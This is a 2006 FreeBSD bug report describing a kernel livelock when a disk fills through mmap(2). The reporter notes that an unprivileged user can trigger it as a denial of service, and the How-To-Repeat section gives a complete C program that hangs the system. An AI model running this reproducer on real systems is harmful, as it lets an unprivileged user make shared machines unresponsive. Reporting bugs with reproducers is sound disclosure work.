kern/104907: Filling up the disk using mmap(2) causes livelock.

trasz trasz at pin.if.uz.zgora.pl
Sun Oct 29 14:10:23 UTC 2006 

>Number:         104907
>Category:       kern
>Synopsis:       Filling up the disk using mmap(2) causes livelock.
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Sun Oct 29 14:10:21 GMT 2006
>Closed-Date:
>Last-Modified:
>Originator:     trasz
>Release:        6.2-PRERELEASE
>Organization:
>Environment:
FreeBSD traszkan.ds7 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #0: Sun Oct 29 00:57:44 CEST 2006     trasz at traszkan.ds7:/usr/obj/usr/src/sys/TRASHCAN  i386
>Description:
Filling up a disk using mmap(2) causes some kind of livelock.  The system becomes
unresponsive.  These messages appear on the console:

Oct 29 14:54:16 sonne kernel: pid 7 (pagedaemon), uid 0 inumber 131261 on /: filesystem full
vnode_pager_putpages: I/O error 28
vnode_pager_putpages: residual I/O 131072 at 44656
vnode_pager_putpages: I/O error 28
vnode_pager_putpages: residual I/O 131072 at 45689
vnode_pager_putpages: I/O error 28
vnode_pager_putpages: residual I/O 131072 at 45391

etc.

It's easy to reproduce by unpriviledged user, so it's kind of DoS bug.

>How-To-Repeat:
Make sure you have _not_ enough disk space and run the following program:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/mman.h>

/*
 * if there is not enough space in the filesystem, this will crash freebsd.
 */

int main(void)
{
        int fd;
        int ret;
        char *addr;
        size_t len=1000000000L;
        char *path="big_file";
        int i;

        fd=open(path, O_RDWR | O_CREAT | O_EXCL, 0664);

        if (fd<0) {
                perror("open");
                exit(-1);
        }

        ret=ftruncate(fd, len);

        if (ret!=0) {
                perror("ftruncate");
                unlink(path);
                exit(-1);
        }

        addr=mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (addr==MAP_FAILED) {
                perror("mmap");
                unlink(path);
                exit(-1);
        }

        for (i=0; i<len; i++)
                *(addr+i)='\42';

        printf("somehow, it survived.\n");
        unlink(path);

        return 0;
}

>Fix:

>Release-Note:
>Audit-Trail:
>Unformatted:

More information about the freebsd-bugs mailing list